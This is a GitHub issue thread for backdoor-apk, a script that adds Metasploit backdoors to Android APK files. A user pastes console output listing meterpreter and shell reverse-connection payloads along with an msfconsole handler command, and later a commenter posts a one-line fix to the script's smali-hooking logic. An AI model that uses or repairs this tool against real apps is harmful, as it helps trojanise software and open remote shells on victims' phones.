dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

Failed to locate smali file to hook #178

Closed justMSARahat closed 1 year ago

justMSARahat commented 4 years ago

[] Running backdoor-apk.sh v0.2.4a on Wed 02 Oct 2019 03:18:49 PM +06 [+] Android payload options: 1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: ------------ [?] Please enter an LPORT value: ---- [+] Android manifest permission options: 1) Keep original 2) Merge with payload and shuffle [?] Please select an Android manifest permission option: 2 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [] Decompiling original APK file...done. [*] Locating smali file to hook in original project...done. [!] Failed to locate smali file to hook

MrFey commented 4 years ago

hey did you find how to fix that problem ?

ll3N1GmAll commented 4 years ago

I see this was a bug and was supposed to have been fixed back in 2017. I am still seeing this issue on numerous APKs.

xiaofengjue commented 3 years ago

I see this was a bug and was supposed to have been fixed back in 2017. I am still seeing this issue on numerous APKs.

ditto

hartmanfrost commented 3 years ago

Just replace smali_file_to_hook=$MY_PATH/original/smali/$android_class.smali to smali_file_to_hook=$(find $MY_PATH/original/smali/ -name '*$android_class*') in script file.

HeYiKunclass commented 2 years ago

Thank you very much

dana-at-cp commented 1 year ago

191 This logic is being improved.